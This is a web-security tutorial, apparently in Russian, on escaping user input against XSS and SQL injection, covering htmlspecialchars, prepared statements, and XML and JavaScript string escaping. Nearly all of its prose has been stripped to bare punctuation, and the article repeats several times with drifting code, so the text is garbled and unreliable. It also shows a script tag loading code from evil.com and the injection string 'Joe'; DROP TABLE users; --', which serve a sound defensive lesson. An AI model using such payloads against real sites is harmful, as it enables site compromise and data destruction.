: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body']); ?>
  </p>
</div>
htmlspecialchars
, , . :
<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
  </p>
</div>
, , , "". HTML .
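As an added example (not the page's PHP, and not the author's code), the three posts from the text rendered in Python through the same template, once unescaped and once with html.escape standing in for htmlspecialchars; the post data is constructed and the dates are preformatted strings rather than date() output.

```python
import html

# Constructed sample posts reusing the three authors from the text.
SAMPLE_POSTS = [
    {"username": "Plato", "date": "January 2, 15:31",
     "body": 'I am said to have said "Lorem ipsum dolor sit amet".'},
    {"username": "Pascal", "date": "November 23, 04:12",
     "body": "Basic math tells us that if x < n and y > n, x cannot be larger than y."},
    {"username": "JackTR", "date": "July 18, 12:56",
     "body": '<script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>'},
]

# Same shape as the page's post template.
TEMPLATE = (
    '<div class="post">\n'
    '  <p class="meta">Posted by {username} on {date}</p>\n'
    '  <p class="body">{body}</p>\n'
    '</div>'
)


def render_unsafe(post):
    """The page's first template: values dropped straight into the HTML.
    Whatever the user typed becomes part of the markup."""
    return TEMPLATE.format(**post)


def escape_html(value):
    """Counterpart of htmlspecialchars(): &, <, >, " become entities so the
    browser shows them as characters instead of parsing them as markup.
    Python's html.escape(quote=True) also escapes the single quote, which
    PHP's default flags (before 8.1) leave alone; the difference does not
    affect the page's examples."""
    return html.escape(value, quote=True)


def render_escaped(post):
    """The page's fixed template: every value escaped before interpolation."""
    return TEMPLATE.format(**{k: escape_html(v) for k, v in post.items()})


def contains_live_script(rendered):
    """Output check: does an unescaped <script tag survive in the HTML?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print(render_unsafe(post))
        print(render_escaped(post))
```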
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
$stmt->execute(array($_POST['name']));
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
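As an added example (not the page's code), the three inputs from the SQL passage above run through all three approaches the text discusses: string interpolation, escaping before interpolation, and a prepared statement. An in-memory SQLite database stands in for MySQL, the sample rows are constructed, and escape_mysql_string is a hand-written stand-in for mysql_real_escape_string that reproduces only the cases in the page's table.

```python
import sqlite3

# Constructed sample data for this example (not from the original page).
SAMPLE_USERS = [("Alex", "555-0100"), ("Mc'Donalds", "555-0101")]

# The three inputs the text walks through.
INPUTS = ["Alex", "Mc'Donalds", "Joe'; DROP TABLE users; --"]

QUERY_TEMPLATE = "SELECT phone_number FROM users WHERE name = '%s'"


def build_query_unsafe(name):
    """String interpolation, as in the page's first PHP snippet: the name is
    pasted into the SQL text unchanged, quotes included."""
    return QUERY_TEMPLATE % name


def escape_mysql_string(value):
    """Stand-in for mysql_real_escape_string(): backslash-escape the backslash
    first, then the single quote. Assumption: this covers only the page's
    table; the real function also handles NUL bytes, newlines and the
    connection charset."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_query_escaped(name):
    """The page's second approach: escape, then interpolate (MySQL syntax).
    Not executed below because SQLite does not use backslash escapes."""
    return QUERY_TEMPLATE % escape_mysql_string(name)


def make_db():
    """In-memory SQLite database standing in for the MySQL server."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, phone_number TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_unsafe(conn, name):
    """Execute the interpolated query. Returns the phone numbers found, or the
    marker 'SQL ERROR' when the database rejects the text it was handed.
    Depending on the Python version, sqlite3 reports a second stacked
    statement as sqlite3.Warning or sqlite3.ProgrammingError, so both are
    caught."""
    try:
        return [row[0] for row in conn.execute(build_query_unsafe(name))]
    except (sqlite3.Error, sqlite3.Warning):
        return "SQL ERROR"


def lookup_prepared(conn, name):
    """Prepared statement: the SQL text is fixed and the value travels
    separately, so no character in the name can change the statement."""
    cur = conn.execute("SELECT phone_number FROM users WHERE name = ?", (name,))
    return [row[0] for row in cur]


def users_table_exists(conn):
    row = conn.execute(
        "SELECT count(*) FROM sqlite_master WHERE type = 'table' AND name = 'users'"
    ).fetchone()
    return row[0] == 1


def demo():
    """Run all three inputs through both lookups; returns a dict of results."""
    conn = make_db()
    return {
        "unsafe": {n: lookup_unsafe(conn, n) for n in INPUTS},
        "prepared": {n: lookup_prepared(conn, n) for n in INPUTS},
        "users_table_still_exists": users_table_exists(conn),
    }


if __name__ == "__main__":
    for name in INPUTS:
        print(build_query_unsafe(name))
        print(build_query_escaped(name))
    print(demo())
```

The interpolated query breaks on the perfectly legitimate Mc'Donalds and is stopped on the Joe input only because sqlite3 refuses to run two statements in one call, which is an accident of the API rather than a fix; the prepared statement treats all three as plain names.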
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?>
<article>
  <author>Homo Sapiens</author>
  <contents>
    Basic math tells us that if x &lt; n and y &gt; n, x cannot be larger than y.
  </contents>
</article>
The "<" became "&lt;", and the ">" became "&gt;".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens";
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens";
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens";
var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
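As an added example (not the page's code), the two escaping schemes from the XML and JavaScript passages above, done in Python: the page's article document is built with its text nodes entity-escaped and parsed back to show the round trip, and the page's quoted sentence is turned into a backslash-escaped JavaScript string literal; json.dumps is used for the latter on the assumption that a JSON string is also a valid JavaScript string literal.

```python
import json
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape as xml_escape

# The two texts the page uses.
CONTENTS = "Basic math tells us that if x < n and y > n, x cannot be larger than y."
QUOTED = 'Plato is said to once have said "Lorem ipsum dolor sit amet".'


def build_article_xml(author, contents):
    """Build the page's <article> document. saxutils.escape replaces exactly
    the three characters the text talks about: & with &amp;, < with &lt;,
    > with &gt;. The ampersand goes first, so a literal "&lt;" in the input
    becomes "&amp;lt;" and is not mistaken for an entity."""
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>\n'
        "<article>\n"
        "  <author>%s</author>\n"
        "  <contents>%s</contents>\n"
        "</article>"
    ) % (xml_escape(author), xml_escape(contents))


def parse_contents(document):
    """Round trip: an XML parser turns the entities back into the original
    characters, which is what makes escaping lossless."""
    return ET.fromstring(document).find("contents").text


def js_string_literal(value):
    """Wrap text in a double-quoted JavaScript string literal. The quote
    becomes \\" and the backslash itself becomes \\\\, the two cases the text
    discusses; json.dumps performs exactly this escaping."""
    return json.dumps(value)


if __name__ == "__main__":
    doc = build_article_xml("Homo Sapiens", CONTENTS)
    print(doc)
    print(parse_contents(doc))
    print("var contents = %s;" % js_string_literal(QUOTED))
    print("var path = %s;" % js_string_literal("C:\\temp"))
```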
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute([$_POST['name']]); // execute() takes the bound values as an array
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
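As an added example that is not from the original article, a JavaScript version of the point made above: each output context (HTML text, a JS string literal) gets its own escaper, and the escaper of one context does nothing useful inside another. The function names and the round-trip check are my own; the sample strings are the article's.

```javascript
// Added example (not from the original article): one escaper per output
// context, plus a check that the escaper must match the context it is used in.
// Inputs are the article's own sample strings, embedded below as constants.

const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML text context: the job htmlspecialchars does in the PHP template.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// JS double-quoted string literal context. The backslash is escaped first;
// otherwise the backslashes added for the quotes would be doubled as well.
function escapeJsString(text) {
  return String(text)
    .replace(/\\/g, '\\\\')
    .replace(/"/g, '\\"')
    .replace(/\n/g, '\\n')
    .replace(/\r/g, '\\r');
}

// Builds the `var contents = "...";` line from the article's JS snippets.
function jsAssignment(varName, text) {
  return `var ${varName} = "${escapeJsString(text)}";`;
}

// Renders the <p class="body"> of the article's post template, escaped for HTML.
function renderPostBody(text) {
  return `<p class="body">${escapeHtml(text)}</p>`;
}

// Detection-style check: how many <script> elements does the markup contain?
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Round-trip check for the JS-string escaper: the escaped literal, parsed back,
// must equal the original text. The escapes emitted above are also valid JSON,
// so JSON.parse stands in for the JS parser here.
function roundTripsAsLiteral(text) {
  return JSON.parse(`"${escapeJsString(text)}"`) === text;
}
```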